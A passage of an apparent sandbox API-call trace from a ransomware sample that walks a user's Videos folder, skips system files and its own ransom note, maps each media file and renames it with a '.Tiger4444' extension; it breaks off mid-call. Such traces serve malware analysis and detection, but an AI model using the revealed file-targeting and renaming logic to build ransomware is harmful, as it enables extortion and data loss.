lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ccfb920, ftCreationTime.dwHighDateTime=0x1d4c6b9, ftLastAccessTime.dwLowDateTime=0x148cbd00, ftLastAccessTime.dwHighDateTime=0x1d4d410, ftLastWriteTime.dwLowDateTime=0x7ffba24b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0045.244] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.244] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0045.244] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0045.244] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0045.244] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0045.244] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x7ffba24b, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x7ffba24b, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x7ffba24b, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0045.244] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.244] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0045.244] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb87c1ee0, ftCreationTime.dwHighDateTime=0x1d4c65c, ftLastAccessTime.dwLowDateTime=0xd4f3c9f0, ftLastAccessTime.dwHighDateTime=0x1d4c743, ftLastWriteTime.dwLowDateTime=0xd4f3c9f0, ftLastWriteTime.dwHighDateTime=0x1d4c743, nFileSizeHigh=0x0, nFileSizeLow=0xa8a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="flFRhosiB.flv", cAlternateFileName="FLFRHO~1.FLV")) returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="Tiger4444.exe") returned -1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2=".") returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="..") returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="windows") returned -1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="bootmgr") returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="pagefile.sys") returned -1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="boot") returned 1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="ids.txt") returned -1 [0045.244] lstrcmpiW (lpString1="flFRhosiB.flv", lpString2="NTUSER.DAT") returned -1 [0045.244] lstrcpyW (in: lpString1=0x30aeafc, lpString2="flFRhosiB.flv" | out: lpString1="flFRhosiB.flv") returned="flFRhosiB.flv" [0045.244] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\flFRhosiB.flv", dwFileAttributes=0x0) returned 1 [0045.245] lstrlenW (lpString="flFRhosiB.flv") returned 13 [0045.245] lstrlenW (lpString="Tiger4444") returned 9 [0045.245] lstrcmpiW (lpString1="hosiB.flv", lpString2="Tiger4444") returned -1 [0045.245] lstrlenW (lpString=".dll") returned 4 [0045.245] lstrcmpiW (lpString1=".flv", lpString2=".dll") returned 1 [0045.245] lstrlenW (lpString=".lnk") returned 4 [0045.245] lstrcmpiW (lpString1=".flv", lpString2=".lnk") returned -1 [0045.245] lstrlenW (lpString=".ini") returned 4 [0045.245] lstrcmpiW (lpString1=".flv", lpString2=".ini") returned -1 [0045.245] lstrlenW (lpString=".sys") returned 4 [0045.245] lstrcmpiW (lpString1=".flv", lpString2=".sys") returned -1 [0045.245] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\flFRhosiB.flv" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\flfrhosib.flv"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.245] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.245] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13669845082) returned 1 [0045.245] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=43170) returned 1 [0045.246] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.246] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71a60 [0045.246] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xabb0, lpName=0x0) returned 0x2c8 [0045.246] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xabb0) returned 0xbe0000 [0045.247] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.247] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.247] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.247] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.247] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.247] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.248] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.248] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.248] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13670070851) returned 1 [0045.248] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.248] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71a60 | out: hHeap=0xc50000) returned 1 [0045.248] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.248] CloseHandle (hObject=0x2c8) returned 1 [0045.248] CloseHandle (hObject=0x260) returned 1 [0045.250] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\flFRhosiB.flv.Tiger4444") returned 65 [0045.250] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\flFRhosiB.flv" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\flfrhosib.flv"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\flFRhosiB.flv.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\flfrhosib.flv.tiger4444"), dwFlags=0x1) returned 1 [0045.251] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=43184 | out: Addend=0xc6f980) returned 16008032 [0045.251] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4433 [0045.251] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82fa4e40, ftCreationTime.dwHighDateTime=0x1d4d291, ftLastAccessTime.dwLowDateTime=0x4fe70690, ftLastAccessTime.dwHighDateTime=0x1d4c9d3, ftLastWriteTime.dwLowDateTime=0x4fe70690, ftLastWriteTime.dwHighDateTime=0x1d4c9d3, nFileSizeHigh=0x0, nFileSizeLow=0xa2e0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LRb2X8JvR7dXd5G2QS.avi", cAlternateFileName="LRB2X8~1.AVI")) returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="Tiger4444.exe") returned -1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2=".") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="..") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="windows") returned -1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="bootmgr") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="pagefile.sys") returned -1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="boot") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="ids.txt") returned 1 [0045.251] lstrcmpiW (lpString1="LRb2X8JvR7dXd5G2QS.avi", lpString2="NTUSER.DAT") returned -1 [0045.251] lstrcpyW (in: lpString1=0x30aeafc, lpString2="LRb2X8JvR7dXd5G2QS.avi" | out: lpString1="LRb2X8JvR7dXd5G2QS.avi") returned="LRb2X8JvR7dXd5G2QS.avi" [0045.252] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\LRb2X8JvR7dXd5G2QS.avi", dwFileAttributes=0x0) returned 1 [0045.252] lstrlenW (lpString="LRb2X8JvR7dXd5G2QS.avi") returned 22 [0045.252] lstrlenW (lpString="Tiger4444") returned 9 [0045.252] lstrcmpiW (lpString1="5G2QS.avi", lpString2="Tiger4444") returned -1 [0045.252] lstrlenW (lpString=".dll") returned 4 [0045.252] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.252] lstrlenW (lpString=".lnk") returned 4 [0045.252] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.252] lstrlenW (lpString=".ini") returned 4 [0045.252] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.252] lstrlenW (lpString=".sys") returned 4 [0045.252] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.252] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\LRb2X8JvR7dXd5G2QS.avi" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\lrb2x8jvr7dxd5g2qs.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.252] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.252] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13670533003) returned 1 [0045.252] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=41696) returned 1 [0045.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc897e8 [0045.252] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71378 [0045.252] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xa5e0, lpName=0x0) returned 0x2c8 [0045.252] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xa5e0) returned 0xbe0000 [0045.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75c98 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75720 [0045.254] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75720 | out: hHeap=0xc50000) returned 1 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75c98 | out: hHeap=0xc50000) returned 1 [0045.254] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13670710609) returned 1 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc897e8 | out: hHeap=0xc50000) returned 1 [0045.254] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71378 | out: hHeap=0xc50000) returned 1 [0045.254] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.255] CloseHandle (hObject=0x2c8) returned 1 [0045.255] CloseHandle (hObject=0x260) returned 1 [0045.257] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\LRb2X8JvR7dXd5G2QS.avi.Tiger4444") returned 74 [0045.257] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\LRb2X8JvR7dXd5G2QS.avi" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\lrb2x8jvr7dxd5g2qs.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\LRb2X8JvR7dXd5G2QS.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\lrb2x8jvr7dxd5g2qs.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.257] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=41696 | out: Addend=0xc6f980) returned 16051216 [0045.257] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4435 [0045.257] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6745e80, ftCreationTime.dwHighDateTime=0x1d4cb32, ftLastAccessTime.dwLowDateTime=0x8c74f080, ftLastAccessTime.dwHighDateTime=0x1d4cbff, ftLastWriteTime.dwLowDateTime=0x8c74f080, ftLastWriteTime.dwHighDateTime=0x1d4cbff, nFileSizeHigh=0x0, nFileSizeLow=0x6985, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MOuupnQy6t5YPt.avi", cAlternateFileName="MOUUPN~1.AVI")) returned 1 [0045.257] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.257] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.257] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="Tiger4444.exe") returned -1 [0045.257] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2=".") returned 1 [0045.257] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="..") returned 1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="windows") returned -1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="bootmgr") returned 1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="pagefile.sys") returned -1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="boot") returned 1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="ids.txt") returned 1 [0045.258] lstrcmpiW (lpString1="MOuupnQy6t5YPt.avi", lpString2="NTUSER.DAT") returned -1 [0045.258] lstrcpyW (in: lpString1=0x30aeafc, lpString2="MOuupnQy6t5YPt.avi" | out: lpString1="MOuupnQy6t5YPt.avi") returned="MOuupnQy6t5YPt.avi" [0045.258] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\MOuupnQy6t5YPt.avi", dwFileAttributes=0x0) returned 1 [0045.258] lstrlenW (lpString="MOuupnQy6t5YPt.avi") returned 18 [0045.258] lstrlenW (lpString="Tiger4444") returned 9 [0045.258] lstrcmpiW (lpString1="t5YPt.avi", lpString2="Tiger4444") returned -1 [0045.258] lstrlenW (lpString=".dll") returned 4 [0045.258] lstrcmpiW (lpString1=".avi", lpString2=".dll") returned -1 [0045.258] lstrlenW (lpString=".lnk") returned 4 [0045.258] lstrcmpiW (lpString1=".avi", lpString2=".lnk") returned -1 [0045.258] lstrlenW (lpString=".ini") returned 4 [0045.258] lstrcmpiW (lpString1=".avi", lpString2=".ini") returned -1 [0045.258] lstrlenW (lpString=".sys") returned 4 [0045.258] lstrcmpiW (lpString1=".avi", lpString2=".sys") returned -1 [0045.258] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\MOuupnQy6t5YPt.avi" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\mouupnqy6t5ypt.avi"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.258] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.258] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13671147667) returned 1 [0045.258] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=27013) returned 1 [0045.258] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0045.258] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71e18 [0045.259] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x6c90, lpName=0x0) returned 0x2c8 [0045.259] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6c90) returned 0xbe0000 [0045.259] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.259] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.260] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.260] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.260] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13671299389) returned 1 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0045.260] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71e18 | out: hHeap=0xc50000) returned 1 [0045.260] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.260] CloseHandle (hObject=0x2c8) returned 1 [0045.260] CloseHandle (hObject=0x260) returned 1 [0045.262] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\MOuupnQy6t5YPt.avi.Tiger4444") returned 70 [0045.262] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\MOuupnQy6t5YPt.avi" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\mouupnqy6t5ypt.avi"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\MOuupnQy6t5YPt.avi.Tiger4444" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\mouupnqy6t5ypt.avi.tiger4444"), dwFlags=0x1) returned 1 [0045.263] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=27024 | out: Addend=0xc6f980) returned 16092912 [0045.263] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4436 [0045.263] FindNextFileW (in: hFindFile=0xc72fc8, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4cab860, ftCreationTime.dwHighDateTime=0x1d4d58c, ftLastAccessTime.dwLowDateTime=0x7dbf120, ftLastAccessTime.dwHighDateTime=0x1d4cf8d, ftLastWriteTime.dwLowDateTime=0x7dbf120, ftLastWriteTime.dwHighDateTime=0x1d4cf8d, nFileSizeHigh=0x0, nFileSizeLow=0x8f72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xBzkCKlaqOVT0MjkjP6.mp4", cAlternateFileName="XBZKCK~1.MP4")) returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="Tiger4444.exe") returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2=".") returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="..") returned 1 [0045.263] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="windows") returned 1 [0045.264] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="bootmgr") returned 1 [0045.264] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="pagefile.sys") returned 1 [0045.264] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="boot") returned 1 [0045.264] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="ids.txt") returned 1 [0045.264] lstrcmpiW (lpString1="xBzkCKlaqOVT0MjkjP6.mp4", lpString2="NTUSER.DAT") returned 1 [0045.264] lstrcpyW (in: lpString1=0x30aeafc, lpString2="xBzkCKlaqOVT0MjkjP6.mp4" | out: lpString1="xBzkCKlaqOVT0MjkjP6.mp4") returned="xBzkCKlaqOVT0MjkjP6.mp4" [0045.264] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\xBzkCKlaqOVT0MjkjP6.mp4", dwFileAttributes=0x0) returned 1 [0045.264] lstrlenW (lpString="xBzkCKlaqOVT0MjkjP6.mp4") returned 23 [0045.264] lstrlenW (lpString="Tiger4444") returned 9 [0045.264] lstrcmpiW (lpString1="jkjP6.mp4", lpString2="Tiger4444") returned -1 [0045.264] lstrlenW (lpString=".dll") returned 4 [0045.264] lstrcmpiW (lpString1=".mp4", lpString2=".dll") returned 1 [0045.264] lstrlenW (lpString=".lnk") returned 4 [0045.264] lstrcmpiW (lpString1=".mp4", lpString2=".lnk") returned 1 [0045.264] lstrlenW (lpString=".ini") returned 4 [0045.264] lstrcmpiW (lpString1=".mp4", lpString2=".ini") returned 1 [0045.264] lstrlenW (lpString=".sys") returned 4 [0045.264] lstrcmpiW (lpString1=".mp4", lpString2=".sys") returned -1 [0045.264] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\xBzkCKlaqOVT0MjkjP6.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\xbzkcklaqovt0mjkjp6.mp4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.264] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.264] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13671747509) returned 1 [0045.264] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=36722) returned 1 [0045.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c20 [0045.264] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71ae8 [0045.265] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9280, lpName=0x0) returned 0x2c8 [0045.265] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9280) returned 0xbe0000 [0045.266] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.266] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75950 [0045.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.266] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75ec8 [0045.266] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75ec8 | out: hHeap=0xc50000) returned 1 [0045.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.266] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75950 | out: hHeap=0xc50000) returned 1 [0045.266] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13671959556) returned 1 [0045.267] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0045.267] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71ae8 | out: hHeap=0xc50000) returned 1 [0045.267] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.267] CloseHandle (hObject=0x2c8) returned 1 [0045.267] CloseHandle (hObject=0x260) returned 1 [0045.269] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\xBzkCKlaqOVT0MjkjP6.mp4.Tiger4444") returned 75 [0045.269] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r gmDnAcszsLl\\xBzkCKlaqOVT0MjkjP6.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\j4la1r gmdnacszsll\\xbzkcklaqovt0mjkjp6.mp4"), lpNewFileName="C:\\Users\\FD1HVy\\Videos\\J4la1r 